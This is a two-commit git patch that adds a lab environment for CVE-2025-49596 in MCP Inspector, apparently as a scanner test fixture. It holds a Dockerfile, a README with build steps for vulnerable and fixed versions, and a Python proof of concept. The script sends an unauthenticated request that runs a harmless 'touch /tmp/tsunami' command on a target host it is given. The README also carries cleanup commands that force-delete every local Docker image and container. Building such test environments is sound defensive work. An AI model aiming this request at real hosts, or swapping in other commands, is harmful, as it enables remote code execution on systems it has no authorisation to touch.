From 3b4dc2d2c3f1255b87b50fc81aed7126a88abd39 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Furkan=20G=C3=B6ksel?= <furkan.goksel27@gmail.com>
Date: Thu, 14 Aug 2025 00:12:23 +0300
Subject: [PATCH 1/2] Add CVE-2025-49596 Environment

---
 mcp-inspector/CVE-2025-49596/Dockerfile      | 52 ++++++++++++++++++++
 mcp-inspector/CVE-2025-49596/README.md       | 43 ++++++++++++++++
 mcp-inspector/CVE-2025-49596/inspectorExp.py | 33 +++++++++++++
 3 files changed, 128 insertions(+)
 create mode 100644 mcp-inspector/CVE-2025-49596/Dockerfile
 create mode 100644 mcp-inspector/CVE-2025-49596/README.md
 create mode 100644 mcp-inspector/CVE-2025-49596/inspectorExp.py

diff --git a/mcp-inspector/CVE-2025-49596/Dockerfile b/mcp-inspector/CVE-2025-49596/Dockerfile
new file mode 100644
index 00000000..f36fb8bb
--- /dev/null
+++ b/mcp-inspector/CVE-2025-49596/Dockerfile
@@ -0,0 +1,52 @@
+# Build stage
+FROM node:24-slim AS builder
+
+# Set working directory
+WORKDIR /app
+
+# Copy package files for installation
+COPY package*.json ./
+COPY .npmrc ./
+COPY client/package*.json ./client/
+COPY server/package*.json ./server/
+COPY cli/package*.json ./cli/
+
+# Install dependencies
+RUN npm ci --ignore-scripts
+
+# Copy source files
+COPY . .
+
+# Build the application
+RUN npm run build
+
+# Production stage
+FROM node:24-slim
+
+WORKDIR /app
+
+# Copy package files for production
+COPY package*.json ./
+COPY .npmrc ./
+COPY client/package*.json ./client/
+COPY server/package*.json ./server/
+COPY cli/package*.json ./cli/
+
+# Install only production dependencies
+RUN npm ci --omit=dev --ignore-scripts
+
+# Copy built files from builder stage
+COPY --from=builder /app/client/dist ./client/dist
+COPY --from=builder /app/client/bin ./client/bin
+COPY --from=builder /app/server/build ./server/build
+COPY --from=builder /app/cli/build ./cli/build
+
+# Set default port values as environment variables
+ENV CLIENT_PORT=6274
+ENV SERVER_PORT=6277
+
+# Document which ports the application uses internally
+EXPOSE ${CLIENT_PORT} ${SERVER_PORT}
+
+# Use ENTRYPOINT with CMD for arguments
+ENTRYPOINT ["npm", "start"]
\ No newline at end of file
diff --git a/mcp-inspector/CVE-2025-49596/README.md b/mcp-inspector/CVE-2025-49596/README.md
new file mode 100644
index 00000000..47c72c08
--- /dev/null
+++ b/mcp-inspector/CVE-2025-49596/README.md
@@ -0,0 +1,43 @@
+# MCP Inspector CVE-2025-49596 
+
+This directory contains the deployment config for MCP Inspector instances vulnerable and fixed to CVE-2025-49596. MCP Inspector versions below 0.14.1 are vulnerable to that remote code execution vulnerability.
+
+## How to Trigger the Vulnerability?
+
+To trigger the vulnerability, you can use the following provided Python Script called inspectorExp.py. After the docker setup, provided script will send the related GET request. In a vulnerable environment, after the Python script, you can see the created file named tsunami under the /tmp/ directory of the running container.
+
+Python code:
+
+```sh
+# Run above Python script to trigger the file creation.
+python inspectorExp.py
+```
+
+In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them.
+
+```sh
+sudo docker rmi -f $(sudo docker images -aq)
+sudo docker remove $(sudo docker ps -a -q)
+```
+
+
+## Fixed version
+```sh
+git clone https://github.com/modelcontextprotocol/inspector.git
+cd inspector && git checkout 0.16.3
+docker build --tag inspector-fixed .
+docker run --network host inspector-fixed 
+```
+
+The vulnerability-related service listens on `localhost:6277` after the docker completes its job.
+
+## Vulnerable version
+```sh
+git clone https://github.com/modelcontextprotocol/inspector.git
+cd inspector && git checkout 0.14.0
+cp ../Dockerfile .
+docker build --tag inspector-vuln .
+docker run --network host inspector-vuln 
+```
+
+The vulnerability-related service listens on `localhost:6277` after the docker completes its job.
diff --git a/mcp-inspector/CVE-2025-49596/inspectorExp.py b/mcp-inspector/CVE-2025-49596/inspectorExp.py
new file mode 100644
index 00000000..18a5297e
--- /dev/null
+++ b/mcp-inspector/CVE-2025-49596/inspectorExp.py
@@ -0,0 +1,33 @@
+import requests
+import sys
+
+def check_mcp_inspector(host="localhost", port=6277):
+    url = f"http://{host}:{port}/sse"
+    params = {
+        "transportType": "stdio",
+        "command": "touch",
+        "args": "/tmp/tsunami"
+    }
+
+    print(f"[*] Checking {url} for CVE‑2025‑49596...")
+    try:
+        response = requests.get(url, params=params, timeout=5)
+        if response.status_code == 200:
+            print("[+] MCP Inspector responded without auth token!")
+            print("[!] This host is likely vulnerable to CVE‑2025‑49596.")
+            print(f"Response: {response.text[:200]}...")
+        elif response.status_code == 401:
+            print("[-] Auth token required. Likely patched version (v0.14.1+).")
+        else:
+            print(f"[-] Unexpected response: {response.status_code}")
+    except requests.exceptions.ConnectionError:
+        print("[-] Could not connect. MCP Inspector may not be running.")
+    except requests.exceptions.Timeout:
+        print("[-] Connection timed out.")
+    except Exception as e:
+        print(f"[-] Error: {e}")
+
+if __name__ == "__main__":
+    target_host = sys.argv[1] if len(sys.argv) > 1 else "localhost"
+    check_mcp_inspector(target_host)
+

From ec4858947a5176a30e7c08aa4c238cf369c8bf5b Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Furkan=20G=C3=B6ksel?= <furkan.goksel27@gmail.com>
Date: Thu, 14 Aug 2025 01:13:15 +0300
Subject: [PATCH 2/2] Update Dockerfile and README.md

---
 mcp-inspector/CVE-2025-49596/Dockerfile | 4 +++-
 mcp-inspector/CVE-2025-49596/README.md  | 1 +
 2 files changed, 4 insertions(+), 1 deletion(-)

diff --git a/mcp-inspector/CVE-2025-49596/Dockerfile b/mcp-inspector/CVE-2025-49596/Dockerfile
index f36fb8bb..807c922d 100644
--- a/mcp-inspector/CVE-2025-49596/Dockerfile
+++ b/mcp-inspector/CVE-2025-49596/Dockerfile
@@ -35,6 +35,8 @@ COPY cli/package*.json ./cli/
 # Install only production dependencies
 RUN npm ci --omit=dev --ignore-scripts
 
+RUN apt-get update && apt-get -y install curl
+
 # Copy built files from builder stage
 COPY --from=builder /app/client/dist ./client/dist
 COPY --from=builder /app/client/bin ./client/bin
@@ -49,4 +51,4 @@ ENV SERVER_PORT=6277
 EXPOSE ${CLIENT_PORT} ${SERVER_PORT}
 
 # Use ENTRYPOINT with CMD for arguments
-ENTRYPOINT ["npm", "start"]
\ No newline at end of file
+ENTRYPOINT ["npm", "start"]
diff --git a/mcp-inspector/CVE-2025-49596/README.md b/mcp-inspector/CVE-2025-49596/README.md
index 47c72c08..f597ca71 100644
--- a/mcp-inspector/CVE-2025-49596/README.md
+++ b/mcp-inspector/CVE-2025-49596/README.md
@@ -25,6 +25,7 @@ sudo docker remove $(sudo docker ps -a -q)
 ```sh
 git clone https://github.com/modelcontextprotocol/inspector.git
 cd inspector && git checkout 0.16.3
+cp ../Dockerfile .
 docker build --tag inspector-fixed .
 docker run --network host inspector-fixed 
 ```